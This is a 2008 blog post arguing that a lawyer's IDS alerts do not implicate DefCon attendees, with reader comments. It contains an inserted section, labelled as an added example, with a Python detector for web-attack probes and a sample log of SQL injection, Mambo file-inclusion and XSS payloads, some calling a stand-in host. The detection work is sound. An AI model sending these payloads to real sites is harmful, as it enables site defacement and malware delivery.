Tuesday, August 19, 2008

Evidence FAIL

So, first read this.

John Dozier, self-described "SuperLawyer" of the Internet, thinks you kids and your DefCon are a bunch of punks. Stay off his lawn.

Of course, I disagree. DefCon used to be a hacker conference by hackers for hackers. Now it's the BlackHat afterparty-slash-olympics. But what it isn't is a bunch of criminals. Sure, there's some mischief, and a few folks even break the rules. But everyone I know who attended DefCon this year (and that number is solidly in the double-digits), works in InfoSec, and uses what they learn at DefCon in their professional lives.

Compelling as my argument may fail to be to people like Mr. Dozier, his argument is weaker than mine. Let's dissect, shall we:

Defcon ... began August 8 and it looks like the hackers sitting in the audience and participating in the hacking competitions spent two days trying to hack into the Dozier Internet Law website using SQL Injection Attacks, Mambo Exploits, encoded cross site scripting attempts, shared ciphers overflow attempts, and the like.

The favorite and most common ISP access was from Vietnam and China, with Beijing the host and doorway of the Olympic Games as well as many, many hackers.

OK, so what we have here is a handful of well-known, aging web attacks (SQL injection, Mambo exploits, encoded XSS probes) aimed at his web server from Vietnam and China, which happen to coincide with the timing of DefCon. Aside from that timing, there is nothing to implicate anybody having anything to do with DefCon. My guess is that this wasn't even an actual human being at all, but rather an Asprox mass-scan that Dozier's IDS detected.
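To make that argument concrete, here is an added example (my own code, not anything from the original post or from Dozier's IDS) that classifies the kind of commodity probes his list describes. It tags each request in a web server log with the generic attack class an IDS would alert on, and for Asprox-style SQL injection, where the statement is hex-encoded inside a `CAST(0x... AS NVARCHAR)` expression, it decodes the payload so you can read what the scanner actually tried to run. The log lines, hosts, paths and the injected statement are all constructed for the demonstration; the `mosConfig_absolute_path` string is the classic Mambo remote-file-inclusion probe, and the double URL-decoding is there because mass scanners routinely double-encode to slip past naive filters.

```python
"""Classify commodity web-attack probes in web server logs (added example)."""
import re
from urllib.parse import unquote

# Apache combined log format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Asprox-style injection: SQL hex-encoded inside CAST(0x... AS [N]VARCHAR(...)).
HEX_CAST_RE = re.compile(r"CAST\(0x([0-9A-Fa-f]+)\s+AS\s+(N?)VARCHAR", re.IGNORECASE)

# Generic signatures, checked in order after the hex-CAST case.
RULES = [
    ("sqli", re.compile(r"(union\s+select|declare\s+@\w+|'\s*or\s+'?\d+'?\s*=\s*'?\d+)", re.IGNORECASE)),
    ("mambo_rfi", re.compile(r"mosConfig_absolute_path\s*=\s*https?://", re.IGNORECASE)),
    ("xss", re.compile(r"<\s*script|javascript:", re.IGNORECASE)),
]


def decode_hex_cast(path):
    """Return the SQL hidden in a CAST(0x... AS [N]VARCHAR) payload, or None."""
    m = HEX_CAST_RE.search(path)
    if not m:
        return None
    try:
        raw = bytes.fromhex(m.group(1))
    except ValueError:  # odd-length or otherwise malformed hex string
        return None
    # NVARCHAR payloads are UTF-16LE; VARCHAR payloads are single-byte text.
    return raw.decode("utf-16-le" if m.group(2) else "latin-1", errors="replace")


def classify(line):
    """Parse one log line and tag it with an attack class ("benign" if none)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Decode twice: scanners often double-encode (%253C -> %3C -> <).
    path = unquote(unquote(m.group("path")))
    result = {"ip": m.group("ip"), "path": path, "category": "benign", "payload": None}
    decoded = decode_hex_cast(path)
    if decoded is not None:
        result["category"] = "sqli_hex_cast"
        result["payload"] = decoded
        return result
    for name, rx in RULES:
        if rx.search(path):
            result["category"] = name
            return result
    return result


def summarize(log_text):
    """Count requests per attack class and list the source IPs that sent probes."""
    counts, attackers = {}, set()
    for line in log_text.splitlines():
        r = classify(line)
        if r is None:
            continue
        counts[r["category"]] = counts.get(r["category"], 0) + 1
        if r["category"] != "benign":
            attackers.add(r["ip"])
    return {"counts": counts, "attackers": sorted(attackers)}


# Constructed payload: the statement a mass scanner would hide inside CAST(0x...).
_INJECTED_SQL = "UPDATE pages SET body=body+'<script src=http://example.invalid/x.js></script>'"
_HEX = _INJECTED_SQL.encode("utf-16-le").hex().upper()

# Constructed sample log (documentation IP ranges, hypothetical paths).
SAMPLE_LOG = f"""\
198.51.100.7 - - [09/Aug/2008:02:11:43 -0700] "GET /index.php?id=1 HTTP/1.1" 200 4096
203.0.113.10 - - [09/Aug/2008:02:12:01 -0700] "GET /page.asp?id=1;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x{_HEX}%20AS%20NVARCHAR(4000));EXEC(@S);-- HTTP/1.1" 500 1200
203.0.113.10 - - [09/Aug/2008:02:12:02 -0700] "GET /index.php?option=com_content&mosConfig_absolute_path=http://example.invalid/c.txt? HTTP/1.1" 404 300
203.0.113.44 - - [09/Aug/2008:02:13:10 -0700] "GET /search.php?q=%253Cscript%253Ealert(1)%253C/script%253E HTTP/1.1" 200 2048
203.0.113.44 - - [09/Aug/2008:02:13:11 -0700] "GET /login.php?user=admin'%20OR%201=1-- HTTP/1.1" 200 2048
"""

if __name__ == "__main__":
    for line in SAMPLE_LOG.splitlines():
        r = classify(line)
        print(r["ip"], r["category"], r["payload"] or "")
    print(summarize(SAMPLE_LOG))
```

Note what the output does and does not tell you: it says these requests match aging, widely scanned-for patterns and came from two addresses, which is exactly the information an IDS graph carries. Nothing in a hit count or a source address attributes the traffic to any person, let alone to someone sitting in a particular conference hall.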

The graph above shows what these hackers do. They come to Vegas to learn how to hack into systems and create havoc.

The funny thing about this is that, with the notable exception of Dan Kaminsky's DNS attacks, there aren't IDS signatures for the research presented at DefCon. Signatures get written for attacks that are already known, and the research is new by definition. So any attacks that did come as a result of learning done at DefCon wouldn't be on that graph at all.

The frustrated perpetrators (they never got access) were sitting in the Riviera Hotel ballrooms, I suspect...

First, the key word there is suspect. Mr. Dozier has zero evidence that these IDS alerts had anything to do with DefCon. None. Not a shred. Second, if DefCon attendees had been behind it, they would've gotten in.

Going after law firm websites and administration areas that contain attorney/client protected communications and documentation, and even court ordered "sealed" files, is a direct attack on the integrity of the judicial process and the judiciary

If you have documents that are sealed by a court order stored on your company website, then you have problems. Most federal district courts won't allow you to file electronically with the court to have a document "sealed" if that document must be, or otherwise is, included in the filing. Those general orders aren't accidents. They are a recognition on the part of the judiciary that electronic documents are inherently less secure. But I digress.

Many attendees commit criminal acts while in attendance in organized war games.

This is simply untrue. There are organized wargames, conducted on an air-gapped network that is isolated from the Internet and from any other network. This is perfectly legal. The US Air Force has staffed a team in the past. By the way, congratulations to Chris Eagle and sk3wl0fr00t on their CTF win. They bested two-time champs 1@stplace, who are some of the smartest people I know, and who are all highly ethical InfoSec professionals.

Others commit criminal acts as they learn the tools of the trade in the very ballroom during speaker presentations. They hack into banks, into personal computers, into businesses, into government agencies, and steal private information, cost businesses billions of dollars annually, and ruin the financial well-being and impair the emotional stability of individuals all across our country.

This is sensational and unsubstantiated. Or as a judge would describe it, hearsay.

This is the mob of the 21st century;

No, John, this is the mob of the 21st century.

The only "security researchers" in attendance, I suspect, are the good guys.

Yes, the security researchers at DefCon are the good guys. And I promise you that the DoD and DoJ agree, as many of the speakers, attendees, volunteers, and contestants at DefCon are paid consultants to these organizations.

UPDATE: John Sawyer has an excellent write-up on this issue and on this year's DefCon (unlike John Dozier, he was actually there) on his blog, Evil Bits, over at Dark Reading. Go read.


Stephen Reese said...

Thank you for a great analysis of the "superlawyer"; one could only assume he's adding fuel to the fire just by the criticisms he has.

PaulM said...

Hi Stephen,

Thanks for the comment. His blog post definitely feels like a troll, doesn't it? And maybe he got my goat and the laugh's on me. But my concern is that, either way, somebody's going to take him seriously on this topic.


Ronald J Riley said...

Dozier is in my opinion a media hound trying to walk with the big dogs but just cannot make the grade. Lots of hype with minimal substance. A small firm with a big bark.

Read about how they got quality time from professional inventors at www.CyberTrialLawyer-SUCKS.com.

We have a number of Dozier sucks domains available for loan and welcome having volunteers to manage those domains to ensure that they receive proper rankings in search engines.

Ronald J. Riley,

Speaking only on my own behalf.
President - www.PIAUSA.org - RJR at PIAUSA.org
Executive Director - www.InventorEd.org - RJR at InvEd.org
Senior Fellow - www.patentPolicy.org
President - Alliance for American Innovation
Caretaker of Intellectual Property Creators on behalf of deceased founder Paul Heckel
Washington, DC
Direct (202) 318-1595 - 9 am to 9 pm EST.

randall said...

Anyone who refers to themselves as a "superlawyer" or really a "super"-anything, is obviously a boob. Why anyone would listen to criticism about a long-standing event and culture, from someone with no actual experience or exposure, is beyond me. Dozier is looking for publicity and hype to add to his "super"-ness. Lame. Too many leading minds in both the public and private sector have been collaborating for too long via DefCon and other events, for someone like Dozier to have anything close to resembling a leg to stand on. He's the worst of the legal system and the media and our industry, all rolled into one middle aged, out-of-touch talking head. Maybe he should run for office.

Anonymous said...

Dozier is clearly attempting to generate fear for his own personal gain. By creating the illusion of an enemy, he is able to portray himself as a just and righteous defender who protects all--but only for an attorney's fee. He's simply using the same game as the Sunday-morning "I can save you from Satan!" televangelists.

ax0n said...

I'm pretty sure Mr. Dozier "did it for the lulz."

Excellent retort, though.